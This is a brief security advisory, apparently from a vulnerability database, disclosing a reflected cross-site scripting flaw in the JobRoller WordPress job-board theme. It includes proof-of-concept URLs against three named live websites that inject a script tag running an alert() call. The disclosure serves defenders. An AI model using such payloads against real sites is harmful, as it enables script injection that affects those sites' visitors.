WordPress jobroller Reflected XSS

2013.06.11
Credit: Infern0_
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Reflected XSS at jobroller - job board for Wordpress #Vendor: appthemes.com/themes/jobroller/ #Type of report: Full Disclosure(vendor informed at the same time) Example PoC: www.nextjobfind.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'"> pracait.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'"> myworknet.com/wp/?s=tester&location=%27%22%3E&ptype=job_listing&latitude=%27%22%3E&longitude=%27%22%3E&full_address=%27%22%3E%3Cscript%3Ealert%28%22Infern0_%22%29%3C/script%3E&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5%27%22%3E Versions <=1.6.3 seems to be affected(last link) <=1.5.1 sure are affected. Regards, Dawid `Infern0_` Balut


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top